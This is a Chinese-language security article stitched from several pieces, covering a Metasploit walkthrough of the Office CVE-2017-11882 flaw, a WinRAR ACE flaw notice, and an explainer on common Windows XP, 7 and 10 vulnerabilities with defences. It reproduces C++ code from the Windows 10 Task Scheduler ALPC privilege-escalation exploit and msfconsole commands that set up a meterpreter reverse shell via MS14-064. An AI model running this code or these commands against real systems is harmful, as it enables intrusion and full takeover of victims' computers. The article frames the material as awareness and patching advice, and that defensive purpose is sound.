文還原利用微軟office漏洞11882攻擊存在此漏洞電腦的整個過程。

前一段時間爆出了最新的Office高危漏洞CVE-2017-11882。2017.11.14微軟發布11月補丁，修復了包括CVE-2017-11882在內的多個漏洞。值得注意的是，該漏洞已潛伏17年之久，影響目前流行的所有Office版本! 影響面相當廣，此漏洞屬于內存損壞漏洞，攻擊者可以利用此漏洞以當前用戶的身份執行任意指令。

漏洞位于EQNEDT32.EXE組件中，該組件于2001年編譯嵌入office，之后沒有任何進一步的修改。攻擊者可以利用漏洞以當前登錄的用戶身份執行任意命令。

雖然微軟在11月發布了補丁，但是有相當一部分人沒有這些安全意識，也有人認為打補丁有時候會導致藍屏等問題發生，所以不更新windows的補丁，或者僅更新windows補丁而不更新其它Microsoft的產品的補丁。換句話說，大部分人裝了office但是沒有打上這個補丁，所以目前安全問題還是很嚴峻。

漏洞利用office的數學公式編輯器功能,涉及模塊EQNEDT32.EXE；當插入或編輯公式時，它會以單獨的進程啟動，而不會以Office進程的子進程啟動。由于該模塊對公式的處理邏輯不嚴謹，給予攻擊者可乘之機；攻擊者通過構造特定的數據內容覆蓋掉棧上的函數返回地址，從而改變函數的執行流程，執行任意的指令。

咱們今天針對這個漏洞進行演示，還原整個攻擊過程。

1.打開我們的kali（攻擊機）并啟動msf。

2.加載office漏洞利用模塊use+模塊，至于這個模塊在哪里，可以到msf的官方去下載相應的腳本。放到kali的msf利用模塊的目錄下就行。

3.我們來配置一下攻擊模塊的參數。

4. 可以看到我們的名為sp的Word文件已經在桌面生成。

5.把這個文檔發到我的其他一臺電腦上(在此提醒大家不要隨意打開來路不明的文件)，并用office打開它。靶機是windows10安裝了office2013。

6.當受害者打開這個Word文檔后，我們回到我們的kali,可以看到msf中的攻擊會話已經建立成功，并且已經拿到了（session 1）

7.進一步拿到meterpreter,這樣就簡單了，我們可以看看被入侵的win10電腦的信息，正在運行的進程。還可以給正在使用電腦前的人截個圖。還有許多令人窒息操作（留后門，創建新用戶等）這里不再贅述。

整個攻擊過程就是這樣。大家可以結合上一次那個比特幣勒索病毒想想，是不是很危險。再次提醒大家不要隨意點擊來路不明的文件。

歷史證明，一旦PoC公布，漏洞通過專業的網絡犯罪組織傳播成為僵尸網絡的速度很快。用戶應立即更新微軟在11月推出的KB2553204、KB3162047、KB4011276和KB4011262補丁以防止CVE-2017-11882遭黑客利用。

inRAR 是一款功能強大的壓縮包管理器，它是檔案工具RAR在 Windows環境下的圖形界面。該軟件可用于備份數據，縮減電子郵件附件的大小，解壓縮從 Internet 上下載的RAR、ZIP及其它類型文件，并且可以新建 RAR 及 ZIP 格式等的壓縮類文件。

近日，國外安全研究人員披露，著名壓縮軟件WinRAR被曝高危漏洞，目前全球已有超過5億用戶受到影響。據報道，在WinRAR 的UNACEV2.dll 代碼庫中發現嚴重安全漏洞，眾多壓縮工具支持.ace格式文件的解壓縮，存在漏洞的ACE解壓模塊文件unacev2.dll創建于2005年，已經14年未更新。

黑客可利用該漏洞繞過權限提升直接運行WinRAR，并將惡意文件放進Windows系統的啟動文件夾中，只要用戶重新開機惡意文件即自動運行，黑客便能“完全控制”受害者計算機。騰訊電腦管家剛剛也發布預警，安全專家驗證，該漏洞不僅僅存在于WinRAR 5.7之前的版本，網民日常使用的Bandizip、2345壓縮、好壓、totalcmd等軟件均存在該風險。騰訊電腦管家建議用戶升級壓縮軟件到最新版本，或者刪除壓縮解壓軟件安裝目錄下的unacev2.dll文件。

只需要在壓縮工具快捷方式的圖標上點擊鼠標右鍵，在彈出的菜單中選擇“打開文件位置”即可跳轉到壓縮工具目錄，將當前目錄下的unacev2.dll文件手動刪除即可。

們電腦的windows系統，默認都會開啟系統更新，經常告訴我們要更新修復系統漏洞，還有我們也會自己安裝一些電腦維護軟件，比如安全衛士或電腦管家，有時系統啟動后經常會彈出窗口提示檢測到存在高危漏洞，那么什么是系統漏洞呢？Windows系統漏洞對電腦會造成什么危害？常見的漏洞有哪些？ 攻擊者是如何利用這些漏洞的？

一、 Windows系統漏洞是什么？

Windows系統漏洞是指操作系統在開發過程中存在的技術缺陷或程序錯誤，這些缺陷可能導致其他用戶(比如黑客)非法訪問或利用病毒攻擊計算機系統，從而竊取電腦重要資料和信息，甚至破壞操作系統。因此，系統開發商(比如微軟公司)一般每月都會發布最新的補丁程序用以修復新發現的漏洞。

二、系統漏洞有什么危害

1、系統漏洞經常被不法者或黑客用于向電腦強制安裝惡意程序、傳播病毒以及植入木馬等；

2、系統漏洞容易導致電腦重要的數據和信息被竊取，嚴重者會導致操作系統被破壞，電腦數據全部丟失；

3、在局域網環境中，還會造成病毒的傳播，導致其他電腦癱瘓，危害極大；

4、被嚴重破壞的操作系統只能通過重裝系統來解決，u盤重裝ghost win7教程圖解。

三、系統漏洞有哪些類型

系統漏洞主要分為兩種，一種是高危漏洞，另一種是功能性漏洞：

1、高危漏洞：系統核心和Office 漏洞，這些漏洞允許遠程執行代碼，使得電腦有被入侵的危險

2、功能性漏洞：軟件版本更新或給系統添加實用功能，用于解決普通的電腦問題，提升電腦性能

四、Windows XP、Windows 7、Windows 10系統常見漏洞

1.Windows XP系統常見漏洞

Windows XP系統常見的漏洞有UPNP服務漏洞、升級程序漏洞、幫助和支持中心漏洞、壓縮文件夾漏洞、服務拒絕漏洞、Windows Media Player漏洞、RDP漏洞、VM漏洞、熱鍵漏洞、賬號快速切換漏洞等。

（1）UPNP服務漏洞

漏洞描述：允許攻擊者執行任意指令。

Windows XP默認啟動的UPNP服務存在嚴重安全漏洞。UPNP（Universal Plug and Play）體系面向無線設備、PC和智能應用，提供普遍的對等網絡連接，在家用信息設備、辦公用網絡設備間提供TCP/IP連接和Web訪問功能，該服務 可用于檢測和集成UPNP硬件。

UPNP協議存在安全漏洞，使攻擊者可非法獲取任何Windows XP的系統級訪問，進行攻擊，還可通過控制多臺XP機器發起分布式的攻擊。

防御策略：禁用UPNP服務后下載并安裝對應的補丁程序。

（2）升級程序漏洞

漏洞描述：如將Windows XP升級至Windows XP Pro，IE會重新安裝，以前打的補丁程序將被全部清除。

Windows XP的升級程序不僅會刪除IE的補丁文件，還會導致微軟的升級服務器無法正確識別IE是否存在缺陷，即Windows XP Pro系統存在如下2個潛在威脅。

·某些網頁或HTML郵件的腳本可自動調用Windows的程序。

·可通過IE漏洞窺視用戶的計算機文件。

防御策略：如IE瀏覽器未下載升級補丁可至微軟網站下載最新補丁程序。

（3）幫助和支持中心漏洞

漏洞描述：刪除用戶系統的文件。

幫助和支持中心提供集成工具，用戶可獲取針對各種主題的幫助和支持。在Windows XP幫助和支持中心存在漏洞，可使攻擊者跳過特殊網頁（在打開該網頁時調用錯誤的函數，并將存在的文件或文件夾名字作為參數傳送）使上傳文件或文件夾的操 作失敗，隨后該網頁可在網站上公布，以攻擊訪問該網站的用戶或被作為郵件傳播來攻擊。該漏洞除使攻擊者可刪除文件外不會賦予其他權利，攻擊者既無法獲取系 統管理員的權限，也無法讀取或修改文件。

防御策略：安裝Windows XP的Service Pack 3。

（4）壓縮文件夾漏洞

漏洞描述：Windows XP壓縮文件夾可按攻擊者的選擇運行代碼。

在安裝有"Plus"包的Windows XP系統中，"壓縮文件夾"功能允許將Zip文件作為普通文件夾處理。"壓縮文件夾"功能存在2個漏洞，如下所述。

·在解壓縮Zip文件時會有未經檢查的緩沖存在于程序中，以存放被解壓文件，因此很可能導致瀏覽器崩潰或攻擊者的代碼被運行。

·解壓縮功能在非用戶指定目錄中放置文件，可使攻擊者在用戶系統的已知位置中放置文件。

防御策略：不接收不信任的郵件附件，也不下載不信任的文件。

（5）服務拒絕漏洞

漏洞描述：服務拒絕。

Windows XP支持點對點的協議（PPTP）作為遠程訪問服務實現的虛擬專用網技術。由于在其控制用于建立、維護和拆開PPTP連接的代碼段中存在未經檢查的緩存， 導致Windows XP的實現中存在漏洞。通過向一臺存在該漏洞的服務器發送不正確的PPTP控制數據，攻擊者可損壞核心內存并導致系統失效，中斷所有系統中正在運行的進 程。該漏洞可攻擊任何一臺提供PPTP服務的服務器。對于PPTP客戶端的工作站，攻擊者只需激活PPTP會話即可進行攻擊。對任何遭到攻擊的系統，可通 過重啟來恢復正常操作。

防御策略：關閉PPTP服務。

（6）Windows Media Player漏洞

漏洞描述：可能導致用戶信息的泄漏，腳本調用，緩存路徑泄漏。

Windows Media Player漏洞主要產生2個問題：一是信息泄漏漏洞，它給攻擊者提供了一種可在用戶系統上運行代碼的方法，微軟對其定義的嚴重級別為"嚴重"；二是腳本 執行漏洞，當用戶選擇播放一個特殊的媒體文件，接著又瀏覽一個特殊建造的網頁后，攻擊者就可利用該漏洞運行腳本。由于該漏洞有特別的時序要求，因此利用該 漏洞進行攻擊相對就比較困難，它的嚴重級別也就比較低。

防御策略：將要播放的文件先下載到本地再播放，即可不受利用此漏洞進行的攻擊。

（7）RDP漏洞

漏洞描述：信息泄露并拒絕服務。

Windows操作系統通過RDP（Remote Data Protocol）為客戶端提供遠程終端會話。RDP協議將終端會話的相關硬件信息傳送至遠程客戶端，其漏洞如下所述。

·與某些RDP版本的會話加密實現有關的漏洞。所有RDP實現均允許對RDP會話中的數據進行加密，在 Windows 2000和Windows XP版本中，純文本會話數據的校驗在發送前并未經過加密，竊聽并記錄RDP會話的攻擊者，可對該校驗密碼分析攻擊并覆蓋該會話傳輸。

·與Windows XP中的RDP實現對某些不正確的數據包處理方法有關的漏洞。當接收這些數據包時，遠程桌面服務將會失效，同時也會導致操作系統失效。攻擊者向一個已受影響的系統發送這類數據包時，并不需經過系統驗證。

防御策略：Windows XP默認并未啟動它的遠程桌面服務。即使遠程桌面服務啟動，只需在防火墻中屏蔽3389端口，即可避免該攻擊。

（8）VM漏洞

漏洞描述：可能造成信息泄露，并執行攻擊者的代碼。

攻擊者可通過向JDBC類傳送無效的參數使宿主應用程序崩潰，攻擊者需在網站上擁有惡意的Java applet并引誘用戶訪問該站點。惡意用戶可在用戶機器上安裝任意DLL，并執行任意的本機代碼，潛在地破壞或讀取內存數據。

防御策略：經常進行相關軟件的安全更新。

（9）熱鍵漏洞

漏洞描述：設置熱鍵后，由于Windows XP的自注銷功能，可使系統"假注銷"，其他用戶即可通過熱鍵調用程序。

熱鍵功能是系統提供的服務，當用戶離開計算機后，該計算機即處于未保護情況下，此時Windows XP會自動實施"自注銷"，雖然無法進入桌面，但由于熱鍵服務還未停止，仍可使用熱鍵啟動應用程序。

防御策略：

①由于該漏洞被利用的前提為熱鍵可用，因此需檢查可能會帶來危害的程序和服務的熱鍵。

②啟動屏幕保護程序，并設置密碼。

③在離開計算機時鎖定計算機。

（10）賬號快速切換漏洞

漏洞描述：Windows XP快速賬號切換功能存在問題，可造成賬號鎖定，使所有非管理員賬號均無法登錄。

Windows XP系統設計了賬號快速切換功能，使用戶可快速地在不同的賬號間切換，但其設計存在問題，可被用于造成賬號鎖定，使所有非管理員賬號均無法登錄。配合賬號 鎖定功能，用戶可利用賬號快速切換功能，快速重試登錄另一個用戶名，系統則會判別為暴力破解，從而導致非管理員賬號鎖定。

2.Windows 7系統常見漏洞

與Windows XP相比，Windows 7系統中的漏洞就少了很多。Windows 7系統中常見的漏洞有快捷方式漏洞與SMB協議漏洞2種。

（1）快捷方式漏洞

漏洞描述：快捷方式漏洞是Windows Shell框架中存在的一個危急安全漏洞。在Shell32.dll的解析過程中，會通過"快捷方式"的文件格式去逐個解析：首先找到快捷方式所指向的文 件路徑，接著找到快捷方式依賴的圖標資源。這樣，Windows桌面和開始菜單上就可以看到各種漂亮的圖標，我們點擊這些快捷方式時，就會執行相應的應用 程序。

微軟Lnk漏洞就是利用了系統解析的機制，攻擊者惡意構造一個特殊的Lnk（快捷方式）文件，精心構造一串程序 代碼來騙過操作系統。當Shell32.dll解析到這串編碼的時候，會認為這個"快捷方式"依賴一個系統控件（dll文件），于是將這個"系統控件"加 載到內存中執行。如果這個"系統控件"是病毒，那么Windows在解析這個lnk（快捷方式）文件時，就把病毒激活了。該病毒很可能通過USB存儲器進 行傳播。

防御策略：禁用USB存儲器的自動運行功能，并且手動檢查USB存儲器的根文件夾。

（2）SMB協議漏洞

SMB協議主要是作為Microsoft網絡的通信協議，用于在計算機間共享文件、打印機、串口等。當用戶執行 SMB2協議時系統將會受到網絡攻擊從而導致系統崩潰或重啟。因此，只要故意發送一個錯誤的網絡協議請求，Windows 7系統就會出現頁面錯誤，從而導致藍屏或死機。

防御策略：關閉SMB服務。

3、Windows 10常見漏洞

本地提權漏洞：

漏洞背景

win10中任務調度服務導出的函數沒有驗證調用者的權限，任意權限的用戶調用該函數可以獲取系統敏感文件的寫權限，進而提權。

漏洞影響

漏洞影響win10和windows server 2016。目前發布的EXP暫時只能用于x64系統。

漏洞詳情

win10系統Task Scheduler任務調度服務中ALPC調用接口導出了SchRpcSetSecurity函數，該函數能夠對一個任務或者文件夾設置安全描述符。

HRESULT SchRpcSetSecurity( [in, string] const wchar_t* path, [in,string] const wchar_t* sddl, [in] DWORD flags );

該服務是通過svchost的服務組netsvcs所啟動的，對應的dll是schedsvc.dll。

在xp系統中，任務存放在C:\Windows\Tasks目錄，后綴為.job；而win7及以后的版本任務以xml的格式存放在C:\Windows\System32\Tasks目錄。

可能是為了兼容的考慮，SchRpcSetSecurity函數在win10中仍然會檢測C:\Windows\Tasks目錄下是否存在后綴為.job的文件，如果存在則會寫入DACL數據。如果將job文件硬鏈接到特定的dll那么特定的dll就會被寫入DACL數據，本來普通用戶對特定的dll只具有讀權限，這樣就具有了寫權限，接下來向dll寫入漏洞利用代碼并啟動相應的程序就獲得了提權。

那么首先需要找到一個普通用戶具有讀權限而系統具有寫入DACL權限的dll，EXP中用的是C:\Windows\System32\DriverStore\FileRepository\prnms003.inf_amd64_4592475aca2acf83\Amd64\printconfig.dll，然后將C:\Windows\Tasks\UpdateTask.job硬鏈接到這個dll。

WIN32_FIND_DATA FindFileData; HANDLE hFind; hFind=FindFirstFile(L"C:\Windows\System32\DriverStore\FileRepository\prnms003.inf_amd64*", &FindFileData); wchar_t BeginPath[MAX_PATH]=L"c:\windows\system32\DriverStore\FileRepository\"; wchar_tPrinterDriverFolder[MAX_PATH]; wchar_t EndPath[23]=L"\Amd64\PrintConfig.dll"; wmemcpy(PrinterDriverFolder, FindFileData.cFileName, wcslen(FindFileData.cFileName)); FindClose(hFind); wcscat(BeginPath, PrinterDriverFolder); wcscat(BeginPath, EndPath); //Create a hardlink with UpdateTask.job to our target, this is the file the task scheduler will write the DACL of CreateNativeHardlink(L"c:\windows\tasks\UpdateTask.job", BeginPath);

在調用SchRpcSetSecurity函數使普通用戶成功獲取了對該dll寫入的權限之后寫入資源文件中的exploit.dll。

//Must be name of final DLL.. might be better ways to grab the handle HMODULE mod=GetModuleHandle(L"ALPC-TaskSched-LPE"); //Payload is included as a resource, you need to modify this resource accordingly. HRSRC myResource=::FindResource(mod, MAKEINTRESOURCE(IDR_RCDATA1), RT_RCDATA); unsigned int myResourceSize=::SizeofResource(mod, myResource); HGLOBAL myResourceData=::LoadResource(mod, myResource); void* pMyBinaryData=::LockResource(myResourceData); //We try to open the DLL in a loop, it could already be loaded somewhere.. if thats the case, it will throw a sharing violation and we should not continue HANDLE hFile; DWORD dwBytesWritten=0; do { hFile=CreateFile(BeginPath,GENERIC_WRITE,0,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL); WriteFile(hFile,(char*)pMyBinaryData,myResourceSize,&dwBytesWritten,NULL); if (hFile==INVALID_HANDLE_VALUE) { Sleep(5000); } } while (hFile==INVALID_HANDLE_VALUE); CloseHandle(hFile);

printconfig.dll和系統打印相關，并且沒有被print spooler服務默認啟動。所以隨后調用StartXpsPrintJob開始一個XPS打印。

//After writing PrintConfig.dll we start an XpsPrintJob to load the dll into the print spooler service. CoInitialize(nullptr); IXpsOMObjectFactory *xpsFactory=NULL; CoCreateInstance(__uuidof(XpsOMObjectFactory), NULL, CLSCTX_INPROC_SERVER, __uuidof(IXpsOMObjectFactory), reinterpret_cast

(&xpsFactory));

HANDLE completionEvent=CreateEvent(

NULL, TRUE, FALSE,

NULL);

IXpsPrintJob *job=

NULL;

IXpsPrintJobStream *jobStream=

NULL;

StartXpsPrintJob(

L"Microsoft XPS Document Writer",

L"Print Job 1",

NULL,

NULL, completionEvent,

NULL,

0, &job, &jobStream,

NULL);

jobStream->Close();

CoUninitialize();

return

0;

整個漏洞利用程序編譯出來是個dll，把它注入到notepad中運行，發現spoolsv.exe創建的notepad已經具有SYSTEM權限，而系統中的printconfig.dll也被修改成了資源文件中的exploit.dll。

防御措施

建議用戶安裝360安全衛士等終端防御軟件攔截利用此類漏洞的攻擊，不要打開來源不明的程序。

四、以實例講解攻擊者是如何利用系統漏洞發起攻擊的

利用MS14-064 漏洞測試入侵win7

Microsoft Windows OLE遠程代碼執行漏洞，OLE（對象鏈接與嵌入）是一種允許應用程序共享數據和功能的技術，

遠程攻擊者利用此漏洞通過構造的網站執行任意代碼，影響Win95+IE3 – Win10+IE11全版本...

里已經加入了此漏洞的利用模塊 ：exploit/windows/browser/ms14_064_ole_code_execution

執行命令：

msfconsole //啟動MSF

search ms14 //搜索關鍵字

use exploit/windows/browser/ms14_064_ole_code_execution // 加載漏洞利用模塊

set payload windows/meterpreter/reverse_tcp //設置反彈連接shell

如圖：

需要注意的是箭頭標記的屬性默認為false 需要設置為true ，因為msf中自帶的漏洞利用exp調用的是 powershell，

所以msf（Metasploit Framework）中的exp代碼只對安裝powershell的系統生效。安裝自帶powershell，

所以我們這里測試受害的機器為windows7 32位.

按照圖中各個屬性配置好后 執行exploit即可

得到一個URL地址，復制到受害者機器(win7)測試

當用戶點擊允許了后

可以看見這邊反彈了一個shell,接下里我們就可以隨便搞了，

攻擊成功，結束?。?！

五、漏洞攻擊如何防護

1、及時修復系統環境中存在的安全漏洞

防范漏洞攻擊最直接有效的方法就是修復系統環境中存在的安全漏洞。

2、 保持騰訊電腦管家、360安全衛士等安全軟件的正常開啟

正常開啟騰訊電腦管家或者360安全衛士等安全軟件，可以有效攔截利用漏洞觸發傳播的病毒，有效彌補漏洞修復的不足。

3、 培養良好的計算機使用習慣

a) 提高計算機網絡安全意識

b) 不要輕易下載不明軟件程序

c) 不要輕易打開不明郵件夾帶的可疑附件

d) 及時備份重要的數據文件